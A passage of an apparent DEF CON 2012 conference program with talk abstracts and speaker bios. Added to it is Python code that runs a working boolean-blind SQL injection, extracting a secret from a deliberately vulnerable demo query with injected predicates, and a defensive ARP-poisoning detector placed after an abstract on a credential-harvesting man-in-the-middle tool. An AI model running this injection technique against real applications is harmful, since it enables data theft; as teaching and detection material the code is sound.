successful in bypassing advanced defense mechanisms developed by the industry. This talk will
take you on a journey through the lives of present-day botnets. With a good set of demonstrations,
we will dissect the crux of the upcoming breed of botnets.
Aditya K Sood is a senior security practitioner and PhD
candidate at Michigan State University. At present he is working for iSECPartners. Prior to that, he has
already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche
Security Labs, an independent security research arena for cutting edge computer security research. At
SecNiche, he also acts as an independent security consultant for providing services including software
security and malware analysis. He has been an active speaker at industry conferences and already
spoken at RSA, Virus Bulletin, HackInTheBox, ToorCon, LayerOne, HackerHalted, SANS, Source,
EuSecWest, XCON, Troopers, OWASP AppSec USA, TRISC and others. He has published several papers
for IEEE Magazines, Virus Bulletin, CrossTalk, Usenix Login, Elsevier Journals, HITB Ezine,
Hakin9, ISSA and ISACA.
Twitter: @AdityaKSood
Blog: Secniche.com
Richard J. Enbody Ph.D., is associate professor in the
Department of Computer Science and Engineering at Michigan State University (USA) where he joined
the faculty in 1987. Enbody has served as acting and associate chair of the department and as
director of the computer engineering undergraduate program. His research interests include
computer security; computer architecture; web-based distance education; and parallel processing,
especially the application of parallel processing to computational science problems. Enbody has
two patents pending on hardware buffer-overflow protection that will prevent most computer
worms and viruses.
http://www.cse.msu.edu/~enbody
How to Channel Your Inner Henry Rollins
Jayson E. Street CIO, Stratagem 1 Solutions
Have you ever found yourself thinking "Boy, I sure wish I could witness a guy rant for 20 minutes and barely come up for air" or maybe "I sure wish I could have seen firsthand an old-time tent revival with a preacher screaming at me"? Well then, great news: you are in luck. This is a talk not just on how we need to take a hard look at how we interact with people outside of our field; it also addresses how we can escape the echo chamber and hopefully burn it to the ground as we leave! All presented in a hopefully comical, but most likely just ranty, way!
Jayson E. Street is the author of the book 'Dissecting the Hack:
The F0rb1dd3n Network' plus creator of the site http://dissectingthehack.com
He's also spoken at DEF CON, BRUCON, UCON & at several
other CONs & colleges on a variety of Information Security subjects.
His life story can be found on Google under 'Jayson E.
Street'.
He's a highly carbonated speaker who has partaken of Pizza
from Beijing to Brazil. He does not expect anybody to still be reading this far
but if they are please note he was chosen as one of Time's persons of the year
for 2006.
Twitter: @jaysonstreet
Facebook: jayson.e.street
http://F0rb1dd3n.com
Can Twitter Really Help Expose Psychopath Killers' Traits?
Chris "TheSuggmeister" Sumner The Online Privacy Foundation
Randall Wald
Recent research has identified links between Psychopaths and the language they use (Hancock et al 2011),
with media reports suggesting that such knowledge could be applied to social networks in order to help Law Enforcement Agencies
expose "Psychopath killers' traits". This is the first public study to research Psychopathy in the context of social media.
This study explored the extent to which it is possible to determine Psychopathy, and other personality traits based on Twitter
usage. This was performed by comparing self-assessment 'Dark Triad' (Psychopathy, Machiavellianism, Narcissism)
and 'Big Five' (Openness, Conscientiousness, Extraversion, Agreeableness, Neuroticism) personality traits with the
Twitter information, usage and language of 2927 participants.
Results show that there are a number of statistically significant correlations between an individual's darker personality
traits and their Twitter activity. We also identified links between users' attitudes to privacy, their personality traits
and their twitter use. We will present the improvement gains possible through the use of machine learning for personality
prediction and share the models and techniques employed.
In addition to presenting our results, this talk will provide an introduction into identifying psychopathic traits using
the Hare Psychopathy Checklist (PCL-R), present the technical approaches to collecting, storing and analyzing Twitter
data using Open Source technologies and discuss the current ethical, privacy and human rights concerns surrounding social
media analysis, vetting and labeling.
We will conclude with two proof of concept works, the first using the visualization tool Maltego to explore how visual
analysis could be used to identify potential troublemakers at events such as far-right demonstrations; the second to
look at how personality traits influence response and interaction with a benign Twitter Bot.
The results highlight that in certain contexts, personality prediction through social media can perform with a
reasonably high degree of accuracy.
Chris is a contributor in the emerging discipline of Social Media Behavioral
Residue research where he combines his interests in Psychology, Social Networks, Data Mining and Visual Analytics.
He has previously spoken about these topics at BlackHat and DEF CON and is scheduled to speak at the European
Conference on Personality in July 2012 with a team of academic personality researchers.
Chris has been directly involved in Corporate Information Security at Hewlett-Packard since 1999 and is currently
focused on Security in the Development Lifecycle. Outside of work and together with a small group of likeminded
individuals, he co-founded the not-for-profit Online Privacy Foundation to conduct topical research and raise
security awareness at a community level.
Twitter: @TheSuggmeister
https://www.facebook.com/onlineprivacyfoundation
http://www.onlineprivacyfoundation.org/
Randall Wald is a researcher studying data mining and machine
learning at Florida Atlantic University. Following his BS in Biology from the
California Institute of Technology, Randall chose to shift his focus
to computer science, applying his domain knowledge towards
bioinformatics and building models to predict disease. He also studies
machine learning for other domains, including machine condition
monitoring, software engineering, and social networking.
http://www.ceecs.fau.edu/directory/randallwald
Attacking TPM Part 2: A Look at the ST19WP18 TPM Device
Chris Tarnovsky Flylogic, Inc.
A die-level analysis of the STMicroelectronics ST19WL18P TPM. Companies like Atmel,
Infineon and ST are pushing motherboard manufacturers to use these devices. End-users trust these devices
to hold passwords and other secrets. Once more, I will show you just how insecure these devices are.
Christopher 'Biggun' Tarnovsky owns Flylogic, Inc. and specializes in
analysis of semiconductors from a security "how strong is it really" standpoint. Flylogic offers detailed
reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a
detailed report all aspects of how the attack was done, level of complexity and so on. This is something we
believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make
them make it better (or possibly use a different part).
Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future
Richard Thieme ThiemeWorks
Thieme's keynote at DEF CON 4 for a few hundred people was "Hacking as Practice for
Trans-planetary Life in the 21st Century." Mudge recently said, "Some of us knew what you meant, and
some of us thought you were nuts." That's likely to be the response to this talk too. Thieme addresses
what he said 17 cons ago, why it was true, and illuminates some likely futures for hacking and hackers,
anonymous 2.0.1, and the gray space of the noir world in which one is deemed a "criminal," not because
of what one does, but according to who one does it for.
Identity, in short, is destiny. More than ever, identity is a choice, modular and fluid.
Mudge was with the l0pht then, now he's with DARPA. Jeff Moss was an entrepreneurial hacker, now he's with
Homeland Defense. Too many to name work in agencies or stateless names and nameless states, fulfilling
the vision of Thieme's first speech.
But that was then. What's likely to be next?
The more we idealize lone hacker wolves in fiction and films, the more assimilated we nevertheless become
into many Borgs, not one. Technologies determine identity, flows of information shape our souls. The
forms into which we fit - in thought, word, and deed - are who we think we are.
So most humans are flocks of birds in digital cages. Hackers however see the implications of making
the cages, create the space in which others live. So the question still is, which pill do you want?
But the matrix has morphed. It's malleable, plastic, and biological, infinitely fun to stretch into
new shapes.
The next twenty years ... the vision of "a deranged old man, wandering around the con," as someone said.
But insanity, sainthood, wisdom look the same. The long view of distance, perspective across the years,
is worth a million fast twitches. Combine rapid action and perspective, however ... turn context
into content ... use both sides of your brain ... and you'll have mastery, a wild trip, and one
hell of a good time.
Richard Thieme is an author and professional speaker focused on the deeper implications of technology for twenty-first century life.
He speaks professionally about the challenges posed by new technologies and the future,
how to redesign ourselves to meet these challenges, and creativity in response to radical
change. Thieme has spoken for sixteen years for the Black Hat Briefings (intelligence and
corporate security) and DEF CON, an annual computer hackers' convention.
About a decade ago, a friend at the National Security Agency suggested that he could address the
issues they discussed in a context of "ethical considerations for intelligence and security
professionals" only if he wrote fiction. "It's the only way you can tell the truth," he was
told. Three dozen published short stories and one novel-in-progress later, the result
is "Mind Games," published in 2010.
Twitter: @neuralcowboy
https://www.facebook.com/pages/Richard-Thieme/107319815723
www.thiemeworks.com
neuralcowboy@skype
Richard Thieme at LinkedIn
Off-Grid Communications with Android: Meshing the Mobile World
Josh "m0nk" Thomas Breaker of Things @ The MITRE Corporation
Jeff "stoker" Robble MITRE Corporation
Before they were a team, the members of project SPAN thought it was highly
limiting to only be able to network smart phones over standard Wi-Fi or with a Cellular infrastructure.
Honestly, the SPAN team isn't a big fan of infrastructure-based networks in general. They wanted a headless,
dynamic network that allowed for resilient communications when the other infrastructure either wasn't
available or when they just didn't feel like using it. They also really liked the idea of a communication
system where there was no central router, server or other central point of sniffing of data. With
this in mind, they teamed up and created project SPAN (Smart Phone AdHoc Networks). They decided
to open source the project and to share not only the code (initial release to coincide with the
presentation) but also the whole process and idea with the community at large. The team is
annoyed that the current generation smart phone radios have the intrinsic ability to communicate
directly with one another, but hardware vendors and mobile OS frameworks don’t make it easy to
do so. Let us show you how it can be done and the fun that can be had from it.
Join the SPAN team for a deep dive into the Android network stack implementation and its limitations,
an analysis of the Wi-Fi chipsets in the current generation of smart phones and a collection of lessons
learned when writing your own network routing protocol (or 5 of them). The team will also share
a "How To" walkthrough into implementing your own Mesh network and incorporating general "Off Grid"
concepts into your next project; this will include securing your mesh from outside parties
while tunneling and bridging through the internet. The team will delve into specific Android
limitations of Ad-Hoc networking and provide workarounds and bypass mechanisms. Lastly, the team
will give an overview of the implementations and network surfaces provided by the new collection of
networking alternatives, including NFC and Wi-Fi Direct.
Josh "m0nk" Thomas is a Security researcher, mobile
phone geek, mesh networking evangelist and general breaker of things electronic. His past
projects have commonly spanned the hardware / software barrier and rarely have a UI. He's
spent the past 12 years poking at embedded systems, networks, IP stacks, AI and right-time
communication systems. A code monkey at heart, m0nk has spent the last year digging deep
into Android and iOS internals, with a major focus on both the network stack implementations
and the driver / below driver hardware interfaces. He uses IDA more frequently than Eclipse,
really just likes playing with gadgets and wants to make the world a better place. His life
dream is to ride a robot unicorn on a moonlit beach.
Twitter: @m0nk_dot
Jeff "stoker" Robble has been writing Java and Android
software for quite a while now and he's become bored pushing blinky lights to the screen. He wanted
to dig deeper into the internals of network stacks and smart phone handsets and SPAN was the
perfect opportunity. At last count, Stoker was seen carrying 14 Android devices in his backpack
and was mumbling something about Ice Cream Sandwich and WiFi Direct scalability.
Socialized Data: Using Social Media as a Cyber Mule
Thor (Hammer of God) Chief Deity, Hammer of God
I don't wear hats. But if I did, even though I'm in an underground bunker
in the dark, it would be kind of "off-whitish-grey." Like many, many of
us in this industry I don't do anything "bad" even though I can. That's
because I choose not to. I think "Freedom" is doing what you want to do -
as a corollary, I think "Liberty" is the degree of *choice* one has in
exercising their Freedom. This is the basis of my "grey" affinity.
Though my actions are "white" by choice, I get very, very concerned when I
see governmental/legislative/enforcement effort encroach upon my liberties
even though it doesn't affect me personally. For instance, I'm totally fine with
DRM and copyright laws. If you don't like the way the vendor produces
their product, don't buy it. However, when legislation like SOPA comes
along, it provides a mechanism for the government to dictate what private,
non-affiliated companies must do in order to protect property belonging to
another private company on their behalf. Though I buy my music and
software (really) I'm vehemently opposed to such legislation, particularly
when all we have to do is edit a hosts file to bypass it. As such, I
assert that any legislator who supported/supports SOPA or similar laws is
an ignorant fucking slag.
I feel the same way about communications as it relates to monitoring,
intercepting, collection and storage outside of my control. That's why I
wrote TGP - so people could use cloud-based resources to encrypt their
communications in a way that no-one can decrypt (presumably). But I
always look for ways around encryption, and more importantly around
*detection* of any method by which I choose to communicate in a manner to
ensure it isn't intercepted, detected, or otherwise divulged to anyone.
And this finally leads us to what this talk is about. When thinking like a
"bad guy" with the goal of distributing any number of covert
communications to any number of recipients, there are a number of critical
attributes which should be present. The message should:
- Be portable and "self-sustaining."
- Be able to be propagated without the originator actually having to *own*
the message or carry it on him.
- Have the ability to control which recipients receive/can read the
message.
- Have the messages backed up and managed by a 3rd party in perpetuity.
- Be free
- Be able to be received without any privileged access to equipment or
any need for specialized equipment to receive.
- Be detection resistant, or even detection PROOF.
This session will be about how to go about just that. ALL of these
attributes will be satisfied, and I will illustrate how you can literally
have a "detection-proof" covert communication. I don't think I've ever
said that before, and just writing the words "detection-proof" makes me
cringe just a bit. But I've racked my brain on a way to detect what I'll
show you and I can't find a way to do it.
That will be the other cool part of this talk - we'll all brainstorm at
the end on a way to detect this. I bet you can't. :) To me, this is the
epitome of what DEF CON is about, and I hope you'll join me at this talk.
Besides, my super-hot wife will be there. Get hammered at Hammer of God!!!
Timothy Mullen is a Principal Security Architect for a worldwide, multibillion-dollar commerce platform, and is rumored to operate somewhere in the vicinity of Seattle, Washington.
Also known as "Thor," he is the founder of the "Hammer of God" security co-op group. He is a member of American Mensa, a Microsoft Certified Trainer, has Microsoft Engineer certifications in all remotely recent operating systems, and has been awarded Microsoft's "Most Valuable Professional" (MVP) award in Windows Enterprise Security four years running.
Mullen has spoken at security conferences world-wide, and has recently published Thor's Microsoft Security Bible, his latest of many books. He has delivered by-invitation presentations to organizations such as Microsoft, the US Federal Court system, the Hong Kong Police and the Geneva School of Engineering. Mullen has also been named a Distinguished Speaker by the NSA and The United States Cyber Command.
hammerofgod.com
Safes and Containers: Insecurity Design Excellence
Marc Weber Tobias Investigative Attorney and Security Specialist, Security.org
Matt Fiddler Security Specialist, Security.org
Tobias Bluzmanis Security Specialist, Security.org
Insecure designs in physical security locks, safes, and other products have consequences
in terms of security, liability, and even loss of life. Marc Weber Tobias and his colleagues Tobias Bluzmanis
and Matthew Fiddler will discuss a number of cases involving design issues that allow locks and safes to be
opened in seconds, focusing on consumer-level containers that are specified as secure for storing valuables
and weapons, and in-room hotel safes that travelers rely upon.
In one instance, the insecurity of a consumer gun safe that is sold by major retailers in the United States played
a part in the death of a three year old child who was able to gain access to a handgun that was locked in a
supposedly secure container.
The presenters will demonstrate different product designs that were represented as secure but in fact are not.
Marc Weber Tobias is an investigative attorney and security
specialist living in Sioux Falls, South Dakota. He is the principal attorney for Investigative
Law Offices, P.C. and as part of his practice represents and consults with lock manufacturers,
government agencies and corporations in the U.S. and overseas regarding the design and bypass
of locks and security systems. Marc and his associates also conduct technical fraud investigations
and deal with related legal issues. Marc has authored five police textbooks, including Locks, Safes,
and Security, which is recognized as a primary reference for law enforcement and security professionals
worldwide. The second edition, a 1400 page two-volume work, is utilized by criminal investigators,
crime labs, locksmiths and those responsible for physical security. A ten-volume multimedia edition
of his book (LSS+) is also available online.
Marc has written extensively about the security vulnerabilities of products and has appeared in numerous television
and radio interviews and news reports as well as magazine articles during the past thirty years. He is a member of
several professional organizations including the American Bar Association (ABA), American Society for Industrial
Security (ASIS), Associated Locksmiths of America (ALOA), Association of Firearms and Tool Mark Examiners (AFTE),
American Polygraph Association (APA) and the American Police Polygraph Association (APPA).
Matt Fiddler is a certified and registered locksmith and Security
Professional with over 20 years of experience. Mr. Fiddler's research into lock bypass techniques has resulted
in many public and private disclosures of critical lock design flaws. Mr. Fiddler began his career as an
Intelligence Analyst with the United States Marine Corps. Since joining the commercial sector in 1992, he
has spent the last 20 years enhancing his extensive expertise in the areas of Covert Entry Tool Design,
Physical Security Consulting, Computer Forensics and Intrusion Analysis.
Tobias Bluzmanis was born in Caracas, Venezuela, came to
the United States in 1995 and was granted citizenship in 2000. He has been a professional locksmith for
the past 20 years. Tobias is an expert in Covert Methods of Entry and has developed many unique forms of
bypass, custom tools, including a decoder for Medeco locks, which was the impetus for the
book "Open in Thirty Seconds".
Rapid Blind SQL Injection Exploitation with BBQSQL
Ben Toews Security Consultant, Neohapsis
Scott Behrens Security Consultant, Neohapsis
Blind SQL injection can be a pain to exploit. When the available tools work they
work well, but when they don't you have to write something custom. This is time-consuming and tedious.
This talk introduces a new tool called BBQSQL that attempts to address these concerns. This
talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue
into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will
cover how features like evented concurrency and character frequency based searching can greatly
improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge
to begin using BBQSQL to simplify and speed up your application pentests.
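As an added illustration of why the search strategy decides how long a blind extraction takes (this is example code written for this page, not BBQSQL's own code): an in-memory SQLite table stands in for the target application, `vulnerable_login` is the deliberately injectable query, and two extraction strategies read the same secret through a one-bit oracle while counting round trips. The table and column names, the `alice` row and the "lowercase letters, then digits" prior are assumptions made for the demonstration; BBQSQL's real frequency model and its evented concurrency are not reproduced here.

```python
import sqlite3

# Constructed target: an in-memory SQLite database standing in for the web app's
# backend.  Table, column and row are invented for this example.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
_db.execute("INSERT INTO users VALUES (1, 'alice', 'password123')")

_queries = 0  # round trips spent by the extraction currently running


def vulnerable_login(username: str) -> bool:
    """The 'application': concatenates untrusted input into SQL (deliberately
    vulnerable) and leaks exactly one bit, whether a row came back."""
    global _queries
    _queries += 1
    sql = "SELECT id FROM users WHERE name = '" + username + "'"  # the bug
    return _db.execute(sql).fetchone() is not None


def oracle(condition: str) -> bool:
    """Boolean-blind primitive: make the app evaluate an arbitrary predicate."""
    return vulnerable_login("alice' AND (" + condition + ") AND '1'='1")


TARGET = "(SELECT secret FROM users WHERE id = 1)"  # subquery we want to read
PRINTABLE = list(range(32, 127))                     # candidate byte values
LOWER = list(range(97, 123))
DIGITS = list(range(48, 58))


def bisect_oracle(candidates, predicate):
    """Binary search over a sorted candidate list using a '<= x' question."""
    while len(candidates) > 1:
        mid = len(candidates) // 2
        if predicate(candidates[mid - 1]):
            candidates = candidates[:mid]
        else:
            candidates = candidates[mid:]
    return candidates[0]


def find_length(max_len=64):
    return bisect_oracle(list(range(1, max_len + 1)),
                         lambda n: oracle(f"length({TARGET}) <= {n}"))


def char_at(pos):
    """Plain strategy: bisect the whole printable range, 6-7 queries a character."""
    expr = f"unicode(substr({TARGET},{pos},1))"
    return chr(bisect_oracle(PRINTABLE, lambda c: oracle(f"{expr} <= {c}")))


def char_at_class_first(pos):
    """Frequency-informed strategy: first ask whether the byte is in the class
    the data is most likely made of (assumed prior: lowercase, then digits),
    and bisect only inside that class.  Falls back to the rest of the range."""
    expr = f"unicode(substr({TARGET},{pos},1))"
    for cls in (LOWER, DIGITS):
        if oracle(f"{expr} BETWEEN {cls[0]} AND {cls[-1]}"):
            return chr(bisect_oracle(cls, lambda c: oracle(f"{expr} <= {c}")))
    rest = [c for c in PRINTABLE if c not in LOWER and c not in DIGITS]
    return chr(bisect_oracle(rest, lambda c: oracle(f"{expr} <= {c}")))


def extract(char_fn):
    """Run a full extraction; return (recovered value, queries it cost)."""
    global _queries
    _queries = 0
    length = find_length()
    value = "".join(char_fn(i) for i in range(1, length + 1))
    return value, _queries


if __name__ == "__main__":
    for name, fn in (("plain bisect", char_at), ("class-first", char_at_class_first)):
        value, cost = extract(fn)
        print(f"{name:13s}: {value!r} in {cost} queries")
```

On the constructed secret the class-first search needs 68 queries against 77 for plain bisection, and the gap widens on longer, mostly alphabetic data, because every lowercase byte is resolved in five questions instead of six or seven. Against a real target each question is a full HTTP round trip, which is where evented concurrency pays off: character positions are independent once the length is known, so their queries can be in flight at the same time.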
Ben Toews is a Security Consultant
at Neohapsis where he specializes in application and network pentesting. Previously,
Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has
been published in HITB Magazine. Ben has a BS in Information Assurance and Security
Engineering from DePaul University.
Twitter: @mastahyeti
http://btoe.ws
Scott Behrens is currently employed as a Security Consultant at
Neohapsis and an Adjunct Professor at DePaul University. Before
Neohapsis, Scott Behrens was an Open Systems Architect for a financial
consulting firm, as well as a Network Administrator at Argonne National
Laboratories. Scott Behrens’ expertise lies in software security
assessment, network penetration testing, social engineering, security
architecture, and security research. Scott is also the co-developer of
NeoPI, a framework to aid in the detection of obfuscated malware. Scott
has also presented at Chicago B-sides and has published numerous
articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University.
Twitter: @HelloArbit
http://www.scottbehrens.com
Subterfuge: The Automated Man-in-the-Middle Attack Framework
Matthew Toussain United States Air Force
Christopher Shields United States Air Force
Walk into Starbucks, plop down a laptop, click start, watch the credentials roll in.
Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as
point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials
that go across the network, and even exploiting machines through race conditions. Now walk into a corporation…
A rapidly-expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex
processes into a framework which provides instantaneous results. On the contrary, much of the information security
community still finds itself performing manual, complicated tasks to administer and protect their computer networks.
The purpose of this presentation is to discuss a new Man-In-The-Middle attack tool called Subterfuge. Subterfuge is a
simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently
trusting Address Resolution Protocol. It does this in a way that lets even a non-technical user, at the push of a
button, attack all machines connected to the network. Subterfuge further provides the framework
by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting,
thus equipping information and network security professionals and enthusiasts alike with a sleek “push-button” security
validation tool.
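A detection-side counterpart, added here as an example and not part of Subterfuge or the original abstract: the same ARP trust that makes one-click credential harvesting possible also leaves a trace a passive sensor can see, an IP address whose MAC suddenly changes, typically for the gateway and a host at the same time. The ARP reply records below are constructed for the example and the gateway address is an assumption.

```python
from collections import defaultdict

# Constructed sample of ARP replies as a passive sensor might record them:
# (seconds since start, sender IP, sender MAC).  Not output of any real tool.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1",  "00:11:22:33:44:01"),  # gateway's genuine reply
    (0.5, "192.168.1.20", "00:11:22:33:44:20"),  # a host's genuine reply
    (1.0, "192.168.1.30", "00:11:22:33:44:30"),
    (2.0, "192.168.1.1",  "de:ad:be:ef:00:99"),  # attacker claims the gateway
    (2.0, "192.168.1.20", "de:ad:be:ef:00:99"),  # ... and the host
    (4.0, "192.168.1.1",  "de:ad:be:ef:00:99"),  # periodic re-poisoning
    (4.0, "192.168.1.20", "de:ad:be:ef:00:99"),
]


def detect_arp_poisoning(replies, gateway_ip):
    """Flag what ARP itself cannot refuse: an IP whose MAC changes, and a MAC
    that took over an IP and now answers for several addresses (the two-sided
    poisoning a MITM tool performs to sit between gateway and victim)."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    last_ts = None
    for ts, ip, mac in replies:
        last_ts = ts
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append({
                "time": ts,
                "severity": "critical" if ip == gateway_ip else "warning",
                "reason": f"{ip} changed from {prev} to {mac}",
                "mac": mac,
            })
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    # A MAC that displaced another *and* claims more than one IP is the
    # signature of a two-sided MITM rather than a legitimate re-addressing.
    for mac in sorted({a["mac"] for a in alerts}):
        ips = sorted(mac_to_ips[mac])
        if len(ips) > 1:
            alerts.append({
                "time": last_ts,
                "severity": "critical",
                "reason": f"{mac} now answers for {', '.join(ips)}",
                "mac": mac,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES, "192.168.1.1"):
        print(f"[{alert['severity']}] t={alert['time']}: {alert['reason']}")
```

On a real network the records would come from a passive ARP sniffer on a mirror port or the host itself. Detection is the cheap half; the fix is to stop trusting unsolicited replies in the first place, with a static ARP entry for the gateway on sensitive hosts or Dynamic ARP Inspection on the switch, so that the "push-button" attack has nothing to push against.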
Matthew M. Toussain developed the Air Force’s introductory
Cyber Warfare curriculum at the United States Air Force Academy, promoting information assurance through
a ten day, fast-paced, offense focused program. As a senior at the Academy he participates in national
and international cyber competitions with the AF Academy’s Cyber Competition Team.
Twitter: @0sm0s1z
Facebook: mtoussain
http://code.google.com/p/subterfuge/
Christopher Shields, Lieutenant in the United States Air Force,
was the first-ever Cyber Commander pioneering the United States Air Force Academy's intensive summer curriculum.
As an integral four-year member of the Academy's internationally-recognized Cyber Warfare Competition Team,
he drove their 2012 Cyber Defense Exercise win, hosted by the NSA, and their second place finish at the 2012
National Collegiate Cyber Defense Competition. A Cyberspace Operations Officer, Lieutenant Shields holds a
Computer Science-Cyber Warfare degree. His growing experience and interest includes network penetration
testing, network mapping and enumeration, intrusion detection, exploitation and persistence, and security research.
Drinking From the Caffeine Firehose We Know as Shodan
Viss
Information Security Consultant, Gentleman of Fortune
Shodan is commonly known for allowing users to search for banners displayed
by a short list of services available over the internet. Shodan can quite easily be used
for searching the internet for potentially vulnerable services to exploit, but it's also
a powerful defensive posturing tool as well as the first step in aggregating wide scopes
of data for mining. Everyone knows routers, switches and servers are connected to the
internet - but what else is out there? Has anybody even looked? I suspect people stop
after the popular searches and forego what's left. Did you know there are hydrogen
fuel cells attached to the internet? Some of my findings were pretty surprising,
and these discoveries are an excellent metric for identifying how successful our
security campaigns as an industry are. It's a way to measure our success as a whole,
by scanning the entire internet.
Viss (Dan Tentler) is currently freelancing as a
Security Consultant and parachutes into various clients in southern California. During the last 5
years Dan has carried a wide breadth of clients and engagements, ranging from wireless site surveys
and penetration testing, to full blown social engineering campaigns, to lockpicking and threat &
vulnerability assessments. Dan has presented at various BarCamps, Toorcon San Diego, ToorCon Seattle,
Refresh San Diego and SDSU computer security advanced lecture classes. Come find Dan and ask him
about things, he'll talk your ear off.
Twitter: @viss
The DCWG Debriefing - How the FBI Grabbed a Bot and Saved the Internet
Paul Vixie Chairman and Founder, Internet Systems Consortium
Andrew Fried Senior Consultant, Cutter Consortium's Business Technology Strategies and Government & Public Sector Practices
In November of 2011 a multinational force of feds and wizards took down Rove Digital's
on-line infrastructure including the DNS Changer name servers. Under contract to the FBI, employees of Internet
Systems Consortium (ISC) installed "clean" replacement DNS servers to take care of a half million DNS Changer victims.
On July 9 2012 the last court order expired and we turned these name servers off, having had only mixed success in
getting the malware cleaned up. Andrew Fried and Paul Vixie of ISC will present the whole story and talk about
some of the hard lessons to be learned.
Dr. Paul Vixie is Chairman and Founder of Internet Systems Consortium.
He served as President of MAPS, PAIX and MIBH, as CTO of Abovenet/MFN, and on the board of several for-profit and
non-profit companies. He has served on the ARIN Board of Trustees since 2005, where he served as Chairman in 2008 and
2009, and is a founding member of ICANN Root Server System Advisory Committee (RSSAC) and ICANN Security and
Stability Advisory Committee (SSAC).
Vixie has been contributing to Internet protocols and UNIX systems as a
protocol designer and software architect since 1980. He is considered
the primary author and technical architect of BIND 8, and he hired many
of the people who wrote BIND 9 and the people now working on BIND 10. He
has authored or co-authored a dozen or so RFCs, mostly on DNS and
related topics, and of Sendmail: Theory and Practice (Digital Press,
1994). He earned his Ph.D. from Keio University for work related to the
Internet Domain Name System (DNS and DNSSEC).
Andrew Fried is a Senior Consultant with Cutter
Consortium's Business Technology Strategies and Government & Public Sector practices. His unique
skill set has earned him a worldwide reputation; his background includes working as a uniformed police
officer, a computer programmer and security analyst, and a Senior Special Agent with the US Department
of the Treasury, a post he retired from after a 20-year career. Mr. Fried's extensive knowledge allows
him to identify large data sources that are seemingly unrelated and combine them to produce findings
that would not be otherwise identified. His passion and tenacity for identifying and stopping Internet
criminal activity has earned him the respect of leading industry experts. During his last two years
at the US Treasury, Mr. Fried was credited with identifying and mitigating over 3,000 fraudulent online
schemes. He currently works as a security researcher for a nonprofit organization involved in identifying
organized criminal enterprises responsible for fraudulent schemes, denial-of-service attacks, malware
propagation, and large-scale botnets. Mr. Fried's work routinely involves data mining and analysis of
data sets that contain hundreds of millions of records.
The Christopher Columbus Rule and DHS
Mark Weatherford
Deputy Undersecretary for Cybersecurity for the National Protection and Programs Directorate (NPPD) at the
United States Department of Homeland Security.
“Never fail to distinguish what’s new, from what’s new to you.” This
rule applies to a lot of people when they think about innovation and
technology in the government. At the U.S. Department of Homeland
Security, in addition to running the National Cybersecurity and
Communication Integration Center (NCCIC), the US-CERT and the
ICS-CERT, they work daily with companies from across the globe to
share critical threat and vulnerability information. DHS also
supports and provides funding for a broad range of cutting-edge
cybersecurity research initiatives, from the development and
implementation of DNSSEC to sponsoring the use of open source
technologies and from development of new cyber forensics tools to
testing technologies that protect the nation’s industrial control
systems and critical infrastructures. This is not your grandfather’s
Buick! During this presentation Deputy Under Secretary for
Cybersecurity Mark Weatherford will talk about research and training
opportunities, the growing number of cybersecurity competitions
sponsored by DHS, and how they are always looking to hire a few good
men and women.
Mark Weatherford is the Deputy Under Secretary for Cybersecurity for
the National Protection and Programs Directorate (NPPD) at the United
States Department of Homeland Security. Weatherford most recently
served as the Vice President and Chief Security Officer of the North
American Electric Reliability Corporation (NERC), where he directed
the organization’s critical infrastructure and cybersecurity program.
He previously served as the Chief Information Security Officer in the
State of California’s Office of Information Security, and as Chief
Security Officer for the State of Colorado, where he helped establish
the state’s first cybersecurity program. Weatherford is a former
Naval Cryptologic Officer, where he led the Navy’s Computer Network
Defense operations and the Naval Computer Incident Response Team.
The Art Of The Con
Paul Wilson Real Hustler
Paul Wilson is the writer and star of "The Real Hustle" and creator of "The Takedown"
on Court TV and "Scammed" on The History Channel. He is one of the world's finest
magicians and an expert on cons, scams, casino cheating and gambling sleight of hand.
He has pulled more confidence tricks than anyone in history in his efforts to
inform and protect the public.
This talk will include a live con game, cheating devices and reasons why
people will always be vulnerable.
Paul Wilson is a world renowned expert on cheating, an award
winning conjuror and magic inventor. He now works in film and television. Paul has worked as an actor, presenter, writer, producer
and director. He has created, developed and produced television shows for NBC, CBS, A&E, BBC, Court TV and Tru TV.
He has been studying sleight of hand, cheating and conjuring since he was eight years old. After
twelve years as a computer consultant, he became a professional performer and lecturer, using the
time to study film before moving into the industry.
He also produced A&E's hit show Mondo Magic, advised Criss Angel for his hit TV show, appeared on "Modern Marvels"
casino technology episodes and is the resident cheating expert on Italian TV's "Arcana" show.
He co-created, produced and starred in Court TV's "The Takedown", a twelve episode series where Paul was challenged
to beat Casino security systems.
He went on to write and present "The Real Hustle" for the BBC. The show is now a hit in
the UK and the fifth season has finished airing. A US version was commissioned by Court TV.
Paul was also the host of VOOM’s “Ultimate Tourist Scams” and has written and presented a
one hour special for BBC ONE where he performed the impossible for members of the public.
He currently works as a professional consultant, producer and director. He occasionally performs his
one-man show "Lie. Cheat. Steal." for the public and corporate clients and
is a regular talk-show guest in the UK.
Twitter: @rpaulwilson
Improving Web Vulnerability Scanning
Dan Zulla
A new approach to web vulnerability scanning that outperforms most existing scanners.
Dan Zulla contributed to various open source
vulnerability scanning projects and to the security of most international web hosting and
virtualization companies. He did vulnerability scanner development, penetration testing and
performance optimization in scaling environments for many years. Last year he built his first
security research company and sold it in less than 8 months to a larger competitor at the
age of 18.
Twitter: @zulladan
www.zulla.org
Speaker Index
A
Alex Abdo
